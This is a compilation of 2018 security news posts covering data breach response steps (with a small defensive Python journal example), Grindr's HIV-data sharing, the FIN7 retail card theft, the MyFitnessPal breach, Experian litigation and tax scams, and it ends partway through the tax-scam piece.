In situations like this, it is often comforting to have a standard policy of some kind in place. At the same time, it is important to recognize that not all security issues are the same, and therefore some cannot be properly addressed with a standard incident response procedure.

Experience comes into play in most situations, but ultimately it is knowledge combined with experience that makes it possible to navigate difficult circumstances and come out stronger as a result. If you think you might be at risk for a data breach or another kind of electronic or digital security issue, here are some things you should consider as part of your response.

Isolate

If your data breach was discovered on any particular piece of hardware, like a server, a cloud machine, or even a mobile device, your first order of business is to isolate that machine from the rest of your network.

The reasons for this are two-fold. First, the overwhelming majority of data breaches rely almost entirely on network access in order to succeed. Second, your top priority is to preserve any evidence available to you and your team. Unless you isolate the breach, there is a better-than-average chance your evidence could be destroyed by the attacker.

Document

It is absolutely vital you keep detailed records of everything you do from the moment the data breach is discovered. This is the undisputed top priority of any investigation or incident response. Without documentation, there is no way you will be able to put the pieces together later and there is no way you’ll be able to prove you performed your due diligence in the event of a dispute.

Photograph

While it may seem strange to suggest that somehow photographs can help you solve a digital data breach, the fact is photographs are a vital tool in any investigation. As all programmers know, software problems are inherently hardware problems. If you have a reliable record of where your hardware was, how it was connected, what was on the screen, how the hardware was configured, what the conditions were at the time and so forth, you may have found details that can help you solve the existing problem or prevent future issues.

Interview

Any person indirectly or directly involved with the systems that were breached should be exhaustively interviewed. Leaving aside for the moment the possibility one of your employees or contractors could have been involved, having eyewitness accounts of the moments leading up to the breach could give you vital clues as to its origin and extent.

Use Your Knowledge

All the investigating in the world isn’t going to help you if you don’t put the knowledge gained to good use. Take what you’ve learned and prepare for the next breach. By and large, digital security issues boil down to inadequate knowledge of how security works. Solutions to that problem are hard to come by but are possible with the right steps.
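As an added example (not part of the TechWorm post), here is one way the “isolate”, “document”, “photograph” and “interview” steps can be written down so that the record itself proves it was not altered later: a small Python journal where every entry carries the SHA-256 hash of the previous entry, so an edit made after the fact breaks the chain at an identifiable point. The incident id, hostnames, people and entries are constructed sample values, not data from any real incident.

```python
"""Tamper-evident incident journal (added example; constructed sample data)."""
import hashlib
import json
from datetime import datetime, timezone

GENESIS = "0" * 64  # "previous hash" carried by the first entry


def _entry_hash(entry):
    """SHA-256 over the canonical JSON of an entry, excluding its own hash field."""
    payload = {k: v for k, v in entry.items() if k != "hash"}
    data = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode("utf-8")
    return hashlib.sha256(data).hexdigest()


class IncidentJournal:
    """Append-only log where each entry commits to the hash of the previous one."""

    def __init__(self, incident_id):
        self.incident_id = incident_id
        self.entries = []

    def record(self, step, host, actor, note, when=None):
        """Append one entry; step is e.g. isolate / document / photograph / interview."""
        when = when or datetime.now(timezone.utc).isoformat(timespec="seconds")
        prev = self.entries[-1]["hash"] if self.entries else GENESIS
        entry = {
            "seq": len(self.entries),
            "incident": self.incident_id,
            "time": when,
            "step": step,
            "host": host,
            "actor": actor,
            "note": note,
            "prev": prev,
        }
        entry["hash"] = _entry_hash(entry)
        self.entries.append(entry)
        return entry["hash"]

    def verify(self):
        """Walk the chain; return (True, None) or (False, seq of the first bad entry)."""
        prev = GENESIS
        for entry in self.entries:
            if entry["prev"] != prev or _entry_hash(entry) != entry["hash"]:
                return False, entry["seq"]
            prev = entry["hash"]
        return True, None

    def export(self):
        """One JSON object per line, suitable for hand-off to counsel or forensics."""
        return "\n".join(json.dumps(e, sort_keys=True) for e in self.entries)

    @classmethod
    def load(cls, text):
        """Rebuild a journal from export() output; stored hashes are kept, not recomputed."""
        entries = [json.loads(line) for line in text.splitlines() if line.strip()]
        journal = cls(entries[0]["incident"] if entries else "unknown")
        journal.entries = entries
        return journal


def build_sample_journal():
    """Constructed sample entries following the steps above (placeholder ids and hosts)."""
    j = IncidentJournal("IR-EXAMPLE-001")  # placeholder incident id
    j.record("isolate", "db-01", "alice",
             "Pulled db-01 from the VLAN; host left powered on to keep volatile evidence",
             when="2018-04-02T09:12:00+00:00")
    j.record("document", "db-01", "alice",
             "Disk and memory images taken; their SHA-256 sums filed in the evidence log",
             when="2018-04-02T09:40:00+00:00")
    j.record("photograph", "db-01", "bob",
             "Photos of rack position, cabling and console screen filed as IMG-0001..0004",
             when="2018-04-02T09:55:00+00:00")
    j.record("interview", "n/a", "bob",
             "On-call admin's account of the 08:40 alert recorded; statement attached",
             when="2018-04-02T11:00:00+00:00")
    return j


def tamper_demo():
    """Edit an entry after the fact and show that verify() pinpoints it."""
    j = build_sample_journal()
    j.entries[1]["note"] = "edited after the fact"
    return j.verify()  # (False, 1)


if __name__ == "__main__":
    journal = build_sample_journal()
    print(journal.verify())                                  # (True, None)
    print(tamper_demo())                                     # (False, 1)
    print(IncidentJournal.load(journal.export()).verify())   # (True, None)
```

The chain only detects changes to entries that are already written; it does not stop someone with write access from appending misleading new ones, which is why the exported lines should also be copied somewhere the responders cannot overwrite (a write-once store or a second custodian) as soon as each step is recorded.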

The post First 5 Steps When Faced with a Data Breach appeared first on TechWorm.

Grindr shared people’s HIV status with other companies

An analysis conducted by the Norwegian research nonprofit SINTEF revealed that the popular Grindr gay dating app is sharing its users’ HIV status with two other companies.

The Grindr gay-dating app made the headlines again; a few days ago an NBC report revealed that the app was affected by two security issues (now patched) that could have exposed the information of its more than 3 million daily users.

An attacker could have exploited the flaws to access location data, private messages to other users, and profile information, even if users had opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working on his website C*ckblocked, which allowed users to see who had blocked them on Grindr.

Faden discovered that once a Grindr user logged in to his service, it was possible to access a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

While the media were still covering that story, another disconcerting revelation came from BuzzFeed and the Norwegian research nonprofit SINTEF: Grindr has been sharing data on whether its users have HIV with two outside companies.

“SVT and SINTEF conducted an experiment the 7th of February 2018 to analyse privacy leaks in the dating application Grindr. This was realised for the Swedish TV program “Plus granskar“, that you may watch online.” reported SINTEF.

“We discovered that Grindr contains many trackers, and shares personal information with various third parties directly from the application.”


Profiles include sensitive information such as HIV status, when a user was last tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP.

“It is unnecessary for Grindr to track its users HIV Status using third-parties services. Moreover, these third-parties are not necessarily certified to host medical data, and Grindr’s users may not be aware that they are sharing such data with them.” added SINTEF.

The disconcerting aspect of this revelation is that Grindr has been sharing users’ HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics.

“The two companies — Apptimize and Localytics, which help optimize apps — receive some of the information that Grindr users choose to include in their profiles, including their HIV status and “last tested date,”” BuzzFeed reports.

“Because the HIV information is sent together with users’ GPS data, phone ID, and email, it could identify specific users and their HIV status, according to Antoine Pultier, a researcher at the Norwegian nonprofit SINTEF, which first identified the issue.”

In some cases, this data was not protected by encryption.

Hours after BuzzFeed’s report, Grindr told Axios that it had made a change to stop sharing users’ HIV status. The company’s security chief, Bryce Case, told Axios that he felt the company was being “unfairly … singled out” in light of Facebook’s Cambridge Analytica scandal and said that the company’s practices didn’t deviate from the industry norm.

Grindr’s chief technology officer, Scott Chen, pointed out that data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.”

In any case, Grindr does not sell user data to third parties.

In a statement released Monday afternoon, Grindr confirmed that it would stop sharing the HIV data.

The company also confirmed to CNNMoney that it has already deleted HIV data from Apptimize, and is in the process of removing it from Localytics.

Pierluigi Paganini

(Security Affairs – mobile app, privacy)

The post Grindr shared people’s HIV status with other companies appeared first on Security Affairs.

Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores

FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

A new data breach made the headlines; the victims are Saks Fifth Avenue and Lord & Taylor stores. According to the parent company Hudson’s Bay Company (HBC), the security breach exposed customer payment card data at certain Saks Fifth Avenue, discount brand Saks OFF 5TH and Lord & Taylor stores in North America.

“We recently became aware of a data security issue involving customer payment card data at certain Saks Fifth Avenue, Saks OFF 5TH, and Lord & Taylor stores in North America. We identified the issue, took steps to contain it, and believe it no longer poses a risk to customers shopping at our stores.” reads the official statement issued by Lord & Taylor.

“While the investigation is ongoing, there is no indication that this affects our e-commerce or other digital platforms,”

The hackers did not compromise the HBC’s e-commerce or other digital platforms, the company promptly informed authorities and hired security investigators to

“We are working rapidly with leading data security investigators to get our customers the information they need, and our investigation is ongoing. We also are coordinating with law enforcement authorities and the payment card companies,” continues the announcement.

The HBC issued the following statement:

“HBC has identified the issue, and has taken steps to contain it,” the company said in a statement. “Once the Company has more clarity around the facts, it will notify customers quickly and will offer those impacted free identity protection services, including credit and web monitoring. HBC encourages customers to review their account statements and contact their card issuers immediately if they identify activity or transactions they do not recognize.”

The data breach was first reported by threat intelligence firm Gemini Advisory, which noticed the offer for sale of over five million stolen credit and debit cards on a cybercrime marketplace called JokerStash.


The researchers linked the security breach to the financially-motivated FIN7 APT group also known as Carbanak or Anunak.

The group continuously changes its attack techniques and implements new malware obfuscation methods. The FIN7 group has been active since late 2015 and has been highly active since the beginning of 2017.

FIN7 was spotted in early 2017 when it targeted personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.

“On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards offered for sale on the dark web. Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores,” Gemini Advisory said in a post.


As of Sunday, only a small portion of the compromised records had been offered for sale: crooks offered roughly 35,000 records for Saks Fifth Avenue and 90,000 records for Lord & Taylor.

“As of this writing, approximately 125,000 records have been released for sale, although we expect the entire cache to become available in the following months.” added Gemini.

At the time of writing, HBC had not provided details on the extent of the security breach, and it is still unclear how the hackers stole the payment card data; experts believe they may have compromised point-of-sale systems.

“Based on the analysis of records that are currently available, it appears that all Lord & Taylor and 83 US based Saks Fifth Avenue locations have been compromised. In addition, we identified three potentially compromised stores located in Ontario, Canada. However, the majority of stolen credit cards were obtained from New York and New Jersey locations.” concluded Gemini.

Pierluigi Paganini

(Security Affairs – HBC data breach, FIN7 APT)

The post Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores appeared first on Security Affairs.

Why Multi-cloud Security Requires Rethinking Network

The Need to Rethink Security For Our Cloud Applications Has Become Urgent. Companies are utilizing the public cloud as their primary route to market for creating and delivering innovative applications.

The post Why Multi-cloud Security Requires Rethinking Network appeared first on The Cyber Security Place.

A week in security (March 26 – April 01)

Last week, we looked at the thought process behind creating a ransomware decryptor, the inner workings of QuantLoader, the ways one can protect their Android devices, the exploit kits we have encountered this winter, the now-known epidemic of data breaches, the coming of TLS 1.3, and the ways one can protect their P2P payment apps.

Other news

  • “Lone wolf” sextortionists pose as hot women behind fake Facebook profiles. (Source: Sophos’s Naked Security Blog)
  • Sad fact: Willing victims of romance scams actually do exist. Not only do they send money to “their partner” whom they haven’t met yet but they also knowingly act as mules. (Source: Security Week)
  • While a majority of IT pros recognize that IoTs are so insecure, not that many are actually doing anything about it. (Source: ZDNet)
  • What happens when you send an application into the background? This SANS diary attempts to answer that. (Source: SANS ISC InfoSec Forums)
  • Well, will you look at that—Monero isn’t that untraceable after all. (Source: Wired)
  • A flaw in the iOS camera application with the way it handles QR codes can be used to redirect users to malicious destinations. (Source: HackRead)
  • Cryptojacking via browsers has been around for a while, and it’s getting more difficult to spot them. (Source: Bleeping Computer)
  • Tax season is getting really close, so scams surrounding this are active with varying payloads. (Source: Proofpoint Blog)
  • As it happens, Under Armor has left some areas uncovered, causing MyFitnessPal to be compromised and affecting 150 million accounts. (Source: The Verge)
  • ‘Cyber bullets’? Cyber bullets! (Source: Fifth Domain)

Stay safe, everyone!

The post A week in security (March 26 – April 01) appeared first on Malwarebytes Labs.

Saks Fifth Avenue, Lord & Taylor Suffer Payment Card Data Breach

Saks Fifth Avenue and Lord & Taylor have both suffered a data breach involving customers’ debit and credit card information. The data breach became apparent on 28 March when Joker’s Stash, a seller of stolen payment card details on underground markets, announced its “BIGBADABOOM-2” sale of five million cards. Working with financial organizations, Gemini Advisory […]

The post Saks Fifth Avenue, Lord & Taylor Suffer Payment Card Data Breach appeared first on The State of Security.

Over 5 million payment cards compromised in Saks, Lord & Taylor data breach

On March 28, Russian hackers known as the JokerStash syndicate or Fin7 were selling on the dark web payment card data stolen from over 5 million customers of the department stores Saks Fifth Avenue, Saks OFF 5TH and Lord & Taylor in New York and New Jersey, writes The New York Times following an investigation carried out by Gemini Advisory.

At the time of research, only 125,000 records were for sale, but Gemini Advisory expects hackers will offer all data in the following months.

The Hudson’s Bay Company, the Canadian owner of the retail chains, confirmed the breach on Sunday and assured customers that only in-store purchases were affected, because the cash register systems had been compromised.

“We have become aware of a data security issue involving customer payment card data at certain Saks Fifth Avenue, Saks Off 5th and Lord & Taylor stores in North America,” the Canadian corporation’s website reads. “We have identified the issue, and have taken steps to contain it. Once we have more clarity around the facts, we will notify our customers quickly and will offer those impacted free identity protection services, including credit and web monitoring.”

According to Gemini Advisory, the estimated window of compromise is between May 2017 and the present, and “the entire network of Lord & Taylor and 83 Saks Fifth Avenue locations have been compromised.”

An investigation is ongoing, but chances are it will show that hackers sent phishing emails to employees asking them to either open a link or download an attachment, installing a backdoor in the company network. This would have allowed the hackers to install malicious software on the cash register systems and steal credit card numbers.

These are not the only chains hit by the hacker group, but this is the largest data breach to hit retail companies. Whole Foods, Chipotle, Omni Hotels & Resorts and Trump Hotels are also among the victims.

The Hudson’s Bay Company will reach out to their customers and offer identity-protection services. Customers are advised to monitor their accounts, review their statements and get in touch with their card issuers if suspicious activity is detected.

Why IT Compliance Is Critical for Cyber Security

IT compliance is sort of like the forgotten stepchild of cyber security. It doesn’t get as much attention as data breach prevention technologies and policies, even though it is equally

The post Why IT Compliance Is Critical for Cyber Security appeared first on The Cyber Security Place.

150 million MyFitnessPal users affected in Under Armour data breach

Under Armour on Thursday announced that over 150 million customers using MyFitnessPal, its nutrition tracking app, were hit by a data breach in late February, earlier this year.

According to Under Armour, they discovered the breach earlier this week and said that an “unauthorised party” had acquired this data. Once they were aware of the breach, they took steps to alert the users using in-app messages as well as email.

They are currently working with data security firms and coordinating with law enforcement authorities to get to the bottom of the breach.

"The investigation indicates that the affected information included usernames, email addresses, and hashed passwords—the majority with the hashing function called bcrypt used to secure passwords," the company said in a statement.

Under Armour said that the attackers would not have been able to access information such as users' Social Security numbers and driver's license numbers, or payment information, in the breach but usernames, email addresses, and password data were taken.

The company is now urging MyFitnessPal users to change their passwords immediately, along with reviewing any suspicious activity in their account. It has also warned its users to be cautious of any emails or unsolicited messages in light of the breach, and to not give away personal data.

The app lets people track their calorie intake, diet, and exercise routines, and was acquired by Under Armour in 2015 for $475 million.

Russian Hacker Who Allegedly Hacked LinkedIn and Dropbox Extradited to US

A Russian man accused of hacking LinkedIn, Dropbox, and Formspring in 2012 and possibly compromising personal details of over 100 million users, has pleaded not guilty in a U.S. federal court after being extradited from the Czech Republic. Yevgeniy Aleksandrovich Nikulin, 30, of Moscow was arrested in Prague on October 5, 2016, by Interpol agents working in collaboration with the FBI, but he

Grindr gay-dating app exposed millions of users’ private data, messages, locations

According to an NBC report, the Grindr gay-dating app was affected by 2 security issues (now patched) that could expose the information of its more than 3 million daily users.

Every day we read of a new data breach, in some cases, exposed data could have a severe impact on the victim.


An attacker could have exploited the feature to access location data, private messages to other users, and profile information, even if they’d opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working on his website C*ckblocked, which allowed users to see who had blocked them on Grindr.

Faden discovered that once a Grindr user logged in to his service, it was possible to access a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

NBC noted that C*ckblocked exploited a “similar security loophole” to one that was recently used by Cambridge Analytica to create a profile of more than 50 million Facebook users.

“Grindr makes public the location of many of its users, but allows for users to opt out of this feature. Faden found that he could find the location of users who had opted out if they connected their Grindr profiles through his third-party website,” reported NBC.

“One could, without too much difficulty or even a huge amount of technological skill, easily pinpoint a user’s exact location,” Faden explained. 


Grindr confirmed it was aware of the issues discovered by Faden and that it had addressed them. Faden shut down his service after Grindr changed its policy on access to data about which users had blocked other users.

Grindr recommends that its users avoid using their Grindr logins for other apps or web services.

“Grindr moved quickly to make changes to its platform to resolve this issue,” the company said in the statement. “Grindr reminds all users that they should never give away their username and password to any third parties claiming to provide a benefit, as they are not authorized by Grindr and could potentially have malicious intent.”

The company published the following statement on its official Twitter account:

In the past, other experts found similar issues in the Grindr service: in 2014 researchers at cybersecurity firm Synack found that it allowed any user to see the profiles and locations of people. Unfortunately, the problems were not completely fixed, and two years later Wired published an interesting article about the experiments of experts who were still able to figure out users’ locations.

Pierluigi Paganini

(Security Affairs – privacy, Grindr gay-dating app)

The post Grindr gay-dating app exposed millions of users’ private data, messages, locations appeared first on Security Affairs.

Over 150 Million MyFitnessPal Accounts Impacted by Massive Data Breach

Maintaining our health is a priority for many of us. So it’s only natural that in the modern digital age, we’ve developed thousands of health apps and gadgets to help monitor our fitness and keep us on track. One of the most popular health apps out there is MyFitnessPal, with which users share their daily diet and fitness information to determine optimal caloric intake. Only now, these users may have unwittingly shared their data with a group of cybercriminals that have breached the popular app. Just yesterday, it was revealed that 150 million accounts for the MyFitnessPal site and app were breached earlier this week.

As of now, few details have emerged about how the attack happened or what the intention was behind it. While the breach did not compromise financial data, large troves of other personal information were affected. The impacted information included usernames, email addresses, and hashed passwords.

MyFitnessPal, which is a subsidiary of Under Armour, has notified affected customers of the breach (see below), and Under Armour has released an official statement making the public aware of the attack as well. So now that potentially impacted customers are aware of the breach – what next?

There are a few security steps affected customers should take immediately. Start by following these pointers below:

  • Change your password immediately. If you are a MyFitnessPal user, you should first and foremost change the password to your account. Then, you should also change your password for any other account on which you used the same or similar information used for your MyFitnessPal account.
  • Stay vigilant. Another way cybercriminals can leverage stolen emails is by using the list for phishing email distribution. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided. Better to just delete the email entirely.
  • Monitor your credit card statement. If cybercriminals are able to leverage the data to gain access to accounts, there’s potential they gain access to financial data, too. And as we know, it’s better to be safe than sorry. Be sure to consistently scan your credit card statement for any suspicious or irregular activity. If you see anything odd, flag to your bank immediately.
  • Lock down your mobile device. If for some reason the MyFitnessPal app is impacted by this attack, or in the future, it’s best you ensure the data stored on your mobile device is secure. To do just that, use a mobile security solution such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Over 150 Million MyFitnessPal Accounts Impacted by Massive Data Breach appeared first on McAfee Blogs.

Fitness Hacker: Under Armour breach affects 150m

The fitness gear maker Under Armour said on Thursday that a breach of its MyFitnessPal website in February resulted in the theft of data on 150 million customers.  Under Armour said it learned of the incident on March 25. The breach affected individuals with MyFitnessPal user accounts. Personal information including the individuals’ user...

MyFitnessPal hacked, 150 million user accounts compromised

American manufacturer of sports gear Under Armour announced that 150 million MyFitnessPal accounts were breached in the largest cyber incident to take place so far this year. Although the nutrition application fell victim to a data breach in late February 2018, it was only detected this week, and users started receiving notification emails four days later.

Hackers did not have access to sensitive data such as government issued identification information, Social Security numbers, driver’s license numbers or payment card data, as this was processed separately, Under Armour stated. The only data that may have been affected are emails, user names and hashed passwords.

“We continue to monitor for suspicious activity and to coordinate with law enforcement authorities,” the company said. Under Armour is working with law enforcement to determine how hackers infiltrated the network and how the data was stolen.

Following the attack, company shares dropped 4 percent.

In the meantime, because emails and passwords are very valuable to hackers, the company urges all users to update their passwords as soon as possible.

“Four days after learning of the issue, the company began notifying the MyFitnessPal community via email and through in-app messaging. The notice contains recommendations for MyFitnessPal users regarding account security steps they can take to help protect their information,” Under Armour said in a statement. “The company will be requiring MyFitnessPal users to change their passwords and is urging users to do so immediately.”

MyFitnessPal was purchased by Under Armour for $475 million in 2015, when it had 80 million users. The application not only monitors nutrition and fitness activity, but it can also be linked to other accounts, such as Fitbit, to monitor calories burned during exercise, as well as RunKeeper, Paer Pedometer and Polar Flow, among others.

Steps to Take to Beat the Insider Threat in 2018

Hackers get the headlines, but a data breach is more likely to originate inside your own office walls. Errors, negligence and malicious intent by employees are the leading causes of

The post Steps to Take to Beat the Insider Threat in 2018 appeared first on The Cyber Security Place.

Under Armour data breach affected about 150 million MyFitnessPal users

Under Armour became aware of a potential security breach on March 25; the company said an unauthorized party had accessed MyFitnessPal user data.

After learning of the data breach on March 25, Under Armour promptly reported the hack to law enforcement and hired security consultants to investigate the incident.

Attackers hacked the MyFitnessPal application that is used by its customers to track fitness activity and calorie consumption.


According to the firm, an unauthorized party obtained access to user data, including usernames, email addresses, and “hashed” passwords.

The good news is that hackers did not access financial data (i.e. payment card data), Social Security numbers or driver’s license numbers.

“On March 25, the MyFitnessPal team became aware that an unauthorized party acquired data associated with MyFitnessPal user accounts in late February 2018. The company quickly took steps to determine the nature and scope of the issue and to alert the MyFitnessPal community of the incident.” reads a statement issued by the company.

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers), which the company does not collect from users. Payment card data was also not affected because it is collected and processed separately. The company’s investigation is ongoing, but indicates that approximately 150 million user accounts were affected by this issue.”

The company notified users of the data breach by email and in-app messaging and advised them to update their settings to protect their account information.

“The notice contains recommendations for MyFitnessPal users regarding account security steps they can take to help protect their information. The company will be requiring MyFitnessPal users to change their passwords and is urging users to do so immediately.” continues the statement.

Pierluigi Paganini

(Security Affairs – Under Armour, data breach)

The post Under Armour data breach affected about 150 million MyFitnessPal users appeared first on Security Affairs.

The data breach epidemic: no info is safe

By now it’s obvious that data security technology and protocols haven’t kept pace with the needs of consumers. Even as more people trust their most sensitive personal information to online apps and services, databases are routinely exposed. In 2017 alone, we learned about massive data breaches from major organizations like Equifax, Uber, and Verizon.

In other words: We’re in the midst of a data breach epidemic.

How bad is it? To help better understand the leaky state of data, TruthFinder created this infographic based on data from the Identity Theft Center. In 2005, there were 157 publicly-reported data breaches of sensitive information. By 2017, that number increased tenfold to 1,579 data breaches.

The severity of breaches is increasing, too. The first breach that leaked over 1 million credit card numbers occurred in 2005, but now we hear about breaches that expose tens or hundreds of millions of records every few months.

Check out TruthFinder’s infographic below. It provides an idea of the serious challenge that security professionals face as they work to turn the tide and secure personal information.

Infographic: the data breach epidemic (TruthFinder)

The post The data breach epidemic: no info is safe appeared first on Malwarebytes Labs.

A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data

This article was published on LinkedIn on March 27, 2018. You can read the original post here.

In my first LinkedIn article, I’d like to welcome you to the future. Not too far into the future. But it’s January 2019 and unfortunately cyber criminals are stealing your data. You’re scrambling to respond, hustling to contain, scurrying to an emergency board meeting. It’s a bad day.

You may be thinking that this isn’t going to happen to you, but many recent headlines say otherwise. So this is my humble letter that I wish I had gotten to you 10 months ago. Today.

From my chair, running IBM’s cybersecurity unit, I get to see things that don’t even make it to the news. Yesterday, we actually helped check references on a hacker for a customer wondering if they should pay bitcoin to get their servers back. This morning, my research team in Israel uncovered a new organized criminal circuit developing a new method to steal money from banks in Brazil. And just in the last 24 hours, my threat intelligence team received indicators of 30 new domains registered by hackers as command and control servers for their malware.

But here’s the thing…even though cybercrime is becoming significantly more sophisticated, there are things we can do that can make a difference. Here are my current top three:

1. Prepare Your Response.

My first advice is that “response” isn’t something that should be considered after a breach is detected, but rather something that needs to be planned and rehearsed way ahead of time.

An effective response to a cyber incident requires preparation and planning — a playbook — as well as training and rehearsing, in the same way hospitals prepare for emergencies. As we’ve seen with recent cyberattacks, often a company’s response can do more damage than the breach.

Last year IBM opened the world’s first “cyber range” for the private sector — a place where clients come for rigorous training to prepare for a potential cyberattack. It’s been an eye opener for us and the 1,400-plus people who have trained there.

Our big takeaway is that this isn’t just a technical team problem — the response needs to span every function in your organization. An effective response plan includes not just the security team’s role in detecting and remediating a breach, but how your organization reacts to regulators, your Board of Directors, law enforcement, clients, employees, the media and other constituents.

Such training and rehearsing helps organizations develop and regularly update a highly detailed and coordinated response plan, and build “muscle memory” that can be thrown into action when a breach occurs.

Most organizations don’t have this. A study we released this week shows nearly 80 percent of organizations surveyed said they cannot remain resilient after a cyberattack due to a lack of planning. And the longer it takes to respond, the higher the costs. For example, a breach contained in less than 30 days saves an organization, on average, nearly $1 million.

2. Change the Game With AI.

AI has the capability to ingest, comprehend and analyze the enormous amount of security data, in whatever forms, that are out there today, and can be deployed quickly. It will help you detect and respond to cyberattacks at speed and scale. More than that, cognitive systems make correlations that provide insight to detect potential breaches much faster than humans alone.

AI will give your security analysts much needed help in finding the needle in the haystack so they can concentrate on stopping the attack.

AI in the form of machine learning enables you to do things like determine if an employee’s identity has been compromised by deeply understanding user behavior and detecting anomalies that could indicate an insider threat. Machine learning can automatically scan new applications for vulnerabilities so developers can continue to move quickly, confident that their app is secure. And when it comes to mobile, AI can see what’s going on at the endpoint and dynamically make recommendations on policies, patches and relevant best practices to keep devices secure.

3. Master the Basics.

Good security hygiene — from keeping software patches updated to scanning applications for vulnerabilities — still counts, maybe more than ever. And from where I sit, not enough companies are focusing on the mundane, hard work of getting the basics right — 100 percent of the time. Any less than that will leave you open to an attack.

Think about cyber security the same way that an engineering or manufacturing company thinks about safety and quality. An auto manufacturer would never accept just a few defective parts leaving the plant. An oil company would not be satisfied losing five percent of its drilling rigs. You should not be satisfied with anything less than perfect either. Drive that into your culture.

I’m not saying these so-called basics are easy to get right. I know your teams are challenged with an enormous — and growing — amount of security data, whether it’s the potentially 200,000 security events you see every day or the 60,000 alert blogs your security analysts need to read each month, all of which needs to be analyzed quickly to find anomalies that may indicate a pending cyberattack. And the significant skills shortage we’re facing in cybersecurity, with an estimated 1.5 to 2 million unfilled security jobs by the end of this decade, is making it even more difficult.

But at the end of the day, this quality control is worth the effort. Mastering these basics from the outset will allow you to react more quickly in the wake of an attack — potentially saving millions of dollars, and significant losses to your reputation. Not only that, it will also help close the gaps so that you’re dealing with fewer of these incidents in the first place.

To wrap up, cybercrime is one of our generation’s most significant issues, equally impacting the public and private sector, as well as consumers and citizens. The basics matter, how you handle an attack makes all the difference in the world, and with AI we have a fighting chance to get ahead of the criminals.

The post A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data appeared first on Security Intelligence.

Taking the Long View of Breach Fallout

In this industry perspective, Thomas Hofmann, the Vice President of Intelligence at the firm Flashpoint warns that the effects of data breaches can often be felt months or years after the actual incident, as stolen data bubbles up in underground marketplaces. He has three pieces of advice for companies that want to develop an incident response...

Businesses know breaches are happening, but do they know how, why and when?

Nearly four in five companies (79%) were hit by a breach in the last year, according to Balabit. Their research also revealed that 68% of businesses expect to be impacted by further breaches this year, with more than a quarter anticipating a breach to occur within the next six months. The Unknown Network Survey, deployed in the UK, France, Germany and the US, reveals the attitudes of 400 IT and security professionals surrounding their IT security … More

The post Businesses know breaches are happening, but do they know how, why and when? appeared first on Help Net Security.

Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols

Despite the lack of bright-line procedures, there are five risk reduction measures a company may consider implementing to reduce its potential exposure to cyber breaches, strengthen its security protocols, and

The post Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols appeared first on The Cyber Security Place.

The City of San Diego is suing the Experian credit agency for 2013 security breach

According to the lawsuit filed by San Diego city attorney Mara Elliott, the Experian credit agency never notified the affected consumers of the 2013 security breach, as required under California law.

The City of San Diego, California is suing the Experian credit agency for the security breach that the company suffered in 2013.

“San Diego City Attorney Mara Elliott has filed a lawsuit against consumer credit giant Experian, contending the company suffered a massive data breach that affected 250,000 people in San Diego and millions more — but never told customers about it.” states a blog post published on The San Diego Union-Tribune.

“Elliott’s office cited the Internal Revenue Service in saying hackers filed more than 13,000 false returns using the hacked information, obtaining $65 million in fraudulent tax refunds.”

According to the lawsuit filed by San Diego city attorney Mara Elliott, the security breach, which was first reported by the well-known expert Brian Krebs, lasted for nine months ending in 2013. The company never notified the affected consumers, as required under California law.

According to The San Diego Union-Tribune, the city attorney argued that data belonging to some 30 million consumers could have been stolen, including information for 250,000 people in San Diego.

According to Krebs, the Vietnamese man Hieu Minh Ngo ran an identity theft service (Superget[dot]info and Findget[dot]me) and gained access to sensitive consumer information by posing as a licensed private investigator in the United States.

The identity theft service Superget[dot]info was based on data from consumer databases maintained by a company that Experian purchased in 2012.

The man was paying Experian thousands of dollars in cash each month for access to 200 million consumer records, then he was reselling them to more than 1,300 users of his ID theft service.

The man was arrested by US authorities and pleaded guilty to identity fraud charges; he was sentenced in July 2014 to 13 years in jail.

In December 2013, an executive from Experian told Congress that the company was not aware of any consumers who were victims of a scam related to the stolen data.

The court order asks the company to formally notify consumers whose personal information was involved in the security breach and to pay the costs of identity protection services for those people.

“The law carries penalties up to $2,500 for each violation, meaning the company could be facing potentially millions in fines.” The San Diego Union-Tribune added.

Pierluigi Paganini

(Security Affairs – Experian security breach, tax refund frauds)

The post The City of San Diego is suing the Experian credit agency for 2013 security breach appeared first on Security Affairs.

Don’t Get Duped: How to Spot 2018’s Top Tax Scams

It’s the most vulnerable time of the year. Tax time is when cyber criminals pull out their best scams and manage to swindle consumers — smart consumers — out of millions of dollars.

According to the Internal Revenue Service (IRS), crooks are getting creative and putting new twists on old scams using email, phishing and malware, threatening phone calls, and various forms of identity theft to gain access to your hard earned tax refund.

While some of these scams are harder to spot than others, almost all of them can be avoided by understanding the covert routes crooks take to access your family’s data and financial accounts.

According to the IRS, the con games around tax time regularly change. Here are just a few of the recent scams to be aware of:

Erroneous refunds

